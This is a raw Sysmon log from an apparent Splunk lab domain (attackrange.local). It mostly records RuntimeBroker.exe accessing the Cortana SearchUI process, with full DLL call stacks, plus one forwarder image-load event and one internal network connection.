08:05:37.875{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.859{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 23542300x80000000000000001053817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.859{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D141B75E01640041A4E048E94AABC75B,SHA256=5C94BA5EC324778BBE3BB79356961F734C741214AE7DE02EF92813B48A21A479,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.843{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.843{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.843{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.843{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.843{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.843{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.774{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+6e886|C:\Windows\System32\windows.storage.dll+701e8|C:\Windows\system32\windows.cortana.Desktop.dll+f6ca|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001053809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.774{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+d3034|C:\Windows\System32\windows.storage.dll+d072b|C:\Windows\system32\windows.cortana.Desktop.dll+f61e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4 354300x8000000000000000810016Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:35.301{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57435-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001053808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.703{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.703{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.703{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.703{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.703{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.703{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.703{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.672{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.672{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 